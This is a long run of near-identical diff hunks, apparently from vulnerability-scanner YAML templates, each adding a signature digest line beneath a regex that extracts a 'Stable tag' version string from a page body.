# digest: 490a0046304402201a8ae0215d80a5b24a855635b77777b373fd7927dd08be82d540d4bbc39c7c2e02201103ca640652089650d2648f75d3c0d251f73309a220dca0a0f25d4254682f23:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022018ded49f8e8fcc91c957d6dbe715f66776f4db25b77b8f3a45eb5b2bf506ca62022100f9cdb90915018e7647fb2e6b0868ffe2ad837d79ab939f87d57badebdceeee5d:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402202aff14fc46f85bb18fd8a4257ce812b4625aed2f5409b6c0333a1bfa292170f8022067363494a038e9fc6c934c56c949ed357e5b859338b73b70a8942ab8b0540e30:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502210094d0eca11b8f891f514d94b1b11c90f4902de4ae4a2dfbe60dc74ec0f85e68d102207908f2536b88e23f3d3e87fdad5cd71c09d271a1fc97b60c956cb70cf2824c91:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a004830460221008cff63e255da8df79af32ce59e3a2c2530a514bf1004d47e70ded86a2cc35a0102210083d5b2621b9413907cc36aecedd23ec7974643469438eaa04ee6a932b3126eb1:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502205862ef262127aca9d00afbc79271ad5ca1e193cf7718779648f0ad040c71b3ae022100d8e8cd5d90e29c0bcc2cc62e9d88683ff16a768aeb3174c51dbb148248fdf047:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a004630440220023e69fc04adc072ac93fbf2fe984338551f0e452e32c1ab7c04ca2d75ae2fed02200ba7a065b1bfe6368df0d70ce91b727d712bd20d264c6a58f497fb91edc876c1:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a004630440220507d9d4bfa2e5155cad3fd71933ec97cdcc221683f3c4632fca11808bf638845022067776641d875281c708f8a63bf409317f6bba8c777af54020994c21fe0babaad:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100dafdee73f80a85d9a28716b29404b23d9a9767c72e53d87d859456f673410702022100f85d798b14660f5fa0b6d5fc253cfc72e33551a428ed3596c2b06e07527005c5:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a0048304602210082a6f894d18059997b41cfc18914f54470b61f2dd1cd06616f706a452b7e180b02210085a44e7b80584b5595b09581db46b363eb04c95b16b571e99a50ef01c60a1d02:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502202565ce8d44e5e6e1a802843019a503ccf14500ce540bd6a4e41599e4c12d5b65022100cb5a4b71b3076dc166c263330dd2002601b9a59c6e2728ab91df1f45ba5d2fee:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100fe4f9e08ba42816d69e127a7b936778e02b66f0da505879034fe7a5673c4c750022067e86bde7d7b4a97fd135af67fde9e2e58a1f08c425bc98f3d56ea9db39d25c8:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100c53b6b47c10087900587d7e4392a0ebd493338680380490c974aad42973b7349022100b28441649bdb2fb8c5985ec83c49e00f11fa95229362ac911cc4018ff82a9bbc:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502202c339126ee7d19be138042d8bc3b7967c217dd9f15d89569c633ed6d6c89a946022100b8f54df740a6110ea06e072af32e09785045f46fedf9c629857491ad69c46944:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100ad3e76fda39e50a3cb3889650fb8442be14ca7bd3d426cc026e4efa60c57f3dd02206dc7204e92dec6a881f874409d394c52ccc109b8d7eabf16b9ca817b39377a2b:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502203f19a400d2383ef61dee72b3cd7d6ed34af02266c6258b7f383821253e251dfb0221008a4847cc2c9b76d21b0e42c752635c291d7544e4b086542b5a114f80d6ca7b46:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402204d2bac0cc63462c0644803ec97cc8aba90440698ba371a4989cbe25fef95402502202c54fd38feb680d0c96291406a9de40a27b80a0c708557194c0539952e36bba0:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402201ae892133315a7220c2248993fd0eadd8f96334198a6064333e7aae670893dac022026d955bd0b1c9aad73f7578c9ada6f539b0c48c386139a61ed7ac51b6f4c6794:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100ecbf58e2cad03bbb94cc4467b2e91ed7d7152b16d43bee835bf62acfff029e2502201d9fb60e76cb8e3e2ddcdf06c725e669e4384fb02b73a9820e7ee4d9da6394db:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100bd6b7328fe5faffa32fb59622f9db833243a6329df37c2497065ea1dd708a35c022100ba47185ab5b6810b19d40c83934d31d0b5e82d32d776eb40518a58413b9d4fcb:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a004630440220142c6116ea45d6df9f2302a60830dc4ae614e3c255bb0c5c6dda75c8b7fe7b50022062bb82a131202995566bc76fff86ac4940779c0e4d89a616b9b041490f150d9e:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100f16945950cc6ddf5ac012b22d816ed0bf6b41506f14c08d0499a07a3fb4ffc15022052bbb33e4ee3607a37d159f763ec3d8cffab19d266cda42146fb3dfced578bef:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100837f2201fd5abc5b6208463fe9a7d9723eaa6f6de4cf6596c4f8e4dc21edc761022045aefb16b79a152ee585b60e31b5209a0d6e0c054575f54028275adda811ba4c:922c64590222798bb761d5b6d8e72950

@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022022f048a7014f3a29bd85474009c4f28f1236ead89b9aadb6bd7b504c5a2cbcdd022100c39aa09aad47d52ff6422e4169ca4ff55202b5d60e5d27ba2055e91b2815a4c0:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402206fa6f8009f35eac29d31373f0aaa62e3b177c9768564709f079d9571aebc56b30220037da0aa3c25268ef1013afa27ab255ec7bcf8edcb5ba875b7c029470d428b02:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100fba44e21da653e1b31eeb56bad8f11025f37bd6248d2734e1ba93f5ed69c30de02207c8233e24b7f12d70323054022df8a32d9d5066f03ea432d6381b7148e66fd41:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100b03db039acc42646e565a6672c9c82028918b0bcfacdd14d5858f32dbb117f8e02206b9c07cfc1d878929f9548f513d5858e5e8c012ccb71600ad0d4553a74560336:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100e8747962ab454a528306b85980e421c70770816f16f1c751ccce151657aa14ad022012e3a22102cbcb65611716c6bc57e214cde05b9ddd844de1936ca13f9f948ec0:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100f67c43c4c235ef5c167af29261e17c5e4dc96bfbaf3ef0782389c638099f8669022100c25743e3f6a061e519a7b5181ddf0efcbd94bc8a656882cec7f3585019520088:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a004730450220590853e09b4871691cc36b3b074790ce5e82ef4368a3e3a698878f3c4a6e278d022100b0d2140a996af5ba2b9c918b520dfc419bfaf930954191010b22d882425f1172:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100e3d60b94e05bfd807f4faabf03964db6940ecf42cf5c351fcfc43ccaa28bd690022100c1f7a3cf37daf11b2ed10ac02675fa608b41e4572fcf5c58d0e162ebd78dea9f:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502201c9d19740238ada408fd96e88243625cb81f26edf53b61649ef8cfad26009fcd022100d82caabf4277a47de76ca86616c752afd7aa9e1908b93882b2876ccd3b273b79:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a004730450221008a2aa019e7836422ab81ede4bfdb4a45742e07a04ac0ffd1ef5cfb02f2cfc8b40220587e11ec7258e59001a1e489328ad7d074146b4280ed881f6ded14a2c72c1f7a:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a004830460221009304617a3b736fe84e781c98931a4f200795bcb1aa378fb9a6f413aeb020122c022100b5ae23df05dd028e343dd5e04fb5a8d416f44fcd136117f0fac9e439bad1b320:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502206c9ad85a68da733d399404989b39e5fc901737223205ca65b5ab1c91097a688f02210093db3a5775bfab8e926958caa4b17d56f98d36594e4c76a686179bc14ccae3ae:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100ba88b401ae7931ed27ef9b72ae18d597c9d521df086bff97db80b41a81a52b5802210082d41c7dfcf15f36032adeeac78610e5208722c6f87bf6936896a49e55b27c78:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100cabd5e3b35a51197116e6ec83879d1bbc8316a4de209005052f9834c4a386b69022002c69a38c19997d71e8da1d08f01f0887072951c525a03cf3f74dac544287681:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100ddaa92b1aa8a0176605c83b9ae347a43d467ad3c9ee4cc00f23dbe9d1445129d022100c1172ba4648ffcb8a5bab3605669c3c1a14547646163ab44c7cbf82a74d52e9c:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502207a61f5f4aacebf4df1ce4197aca4fac5507d1e8dc943d39d8c20e820ec77754e022100d90d7a8cc1ef5fba34286bd15f46b5d94ebbfc6e64be20c53ff0fbcd8b016fe6:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a00463044022034dd401daeb221640139a5344a375db03e3a76ad3a8523fcd266595c49730ed602201fdcf39c59ff69c7776ac67052ff483b71b4238268fc6c855628793456c5b7e5:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502201da7bebf55b861e1eb7176f91f6733c9b99817b0595b88a1bdc96347ccdc1f54022100c2902cf6b193cb6942eec02edf755be8b14687fba65de3f9f4196103c26bc7ac:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402205492ccc5bb159a425b5e1975391ecdb5919bddce78facc71982b5ca44f54008802203bd8578ec4fd54c186e14206154fd8026b037c57c10e89471b9904d527fb75b8:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100af1158da46ff7695fe83ef2baf6547f8bf24b7bbabe9f0b67fa1e8a72218ab61022100a10b1fbc04f44f675da49e2da2ededf2aa2c0ebceeb41309a05b5ea042084389:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022008a40b6f57dba513814e3177b6e5af9b92d7197d750bbeb77da3260291afd917022100ee3105baac95ded6e02e2404eb48a0a2f74248a00709711cfb4a48382e551aa9:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100fc40d5f4319fd03404b88991e3bd91c1c61d73c5a44d9d40832b92fd4d6722a1022008f54dcd5f04c0fbe547bc98ee4a57ee440c24f58ff4e327913cc0cd7ece07a6:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402207cb159bca364de9caa2b6493cf0025355ca529c9f8309e66f24fd1bbc669780f022077f183fbb8047bec6b7abc7945c92ba60a6c9fe32633ab03556b4e78b6d0d9d4:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 490a0046304402203d382c6f422d33e1cd0366f19b7fc93e065f317a0ff0a1fdd3d69d8bbfbd9892022079713e626e1ddbf224e9c0760fb20029b898fbd4fbd86493cf21547a1d13e7b3:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a004830460221008154d36e69f20ba57a1d1ef02f29464634cbdb7880294185b469c93d88eb968c022100eee7ea9580bff18c29fd23bc863255f56f359b3d440c1d4ec3695386b6264a7a:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100fef1470dd186bad73997df6dcd6cb35a2af9362f44846eb3f7d4519f8b4715f102202a02713619ae40cd22022a570b8e2d6abc5d3bb30982fa1b3db1d09df3fc26a8:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100a3c2bcadd2519af6af099c9e9cab4f2903ce09c4460cc1496328280acfed9ce4022013a77ecd1e5402f7c1b3b1c5b76a1688540f34574476bd569e7a0f2e0d1141b6:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502210085ca52537704983ae97254a4d48ca0b919759c406763a46f9f9715968e220ff002204b1be189424c213481e4ccb6b132d2830440ff9e12de133965380486952cffaf:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022046e685f53e14068d9dfc4fa42b04ceef7e8275fe63cf8d0e4458d61b37867582022100895ac18217337f1b2072263dcdf58845d0d09d19a6440564b6d771379b0ad28b:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502201ffb37fb44f43ac796f15ba4bd46abf1794a4a6418ec046e7de056804c2603f50221008d1bcb10b0c32c677f4f4c9f7d24095540aa3699e5abc2b8c3d6c54a12232a56:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100c6c0bfd2732e1a9e07eadcfe9f8c81d87b7e424b71d797ff715b9fcb90a6d61d02201dff670180a6c3f9accd16e75dc5a5d6a6a8bb71fe1de9120c09d0219515c9b4:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100cf9bea06d371f05ab5400672884ca915368a6957d42fc652e7f313617f3e75390220329004d55597df3f1c2a41800c02043ed2cdb4cd3e7be052b1d65f3101118f9b:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4b0a00483046022100ff1cc35df8a0b68ec33c3914d72d30a5f00e506a7de8f82f06b4b91d5ab5f9ed022100af87309cd302586964d97c4eae8dfcefcdbc72da76fcfbead3516aca6bde24b0:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a0047304502203fe1ef8d4c6d2911f616f120f11a3d30a091381aebce15549ac1e092b45124240221008316cfe027870d68f66ee853f4fb56b411ac041b550dd2e3155500b45dfe992d:922c64590222798bb761d5b6d8e72950


@ -46,3 +46,4 @@ http:
part: body
regex:
- '(?i)Stable.tag:\s?([\w.]+)'
# digest: 4a0a00473045022100e556d96b19c73914755b08d60e6d11af79ac85ed6ac89d019e9056b6106e7d2602204309dfe4df03775c2eb99bfb0bf98a1e02f8f28d55f894fbcabb6fa6748d4152:922c64590222798bb761d5b6d8e72950
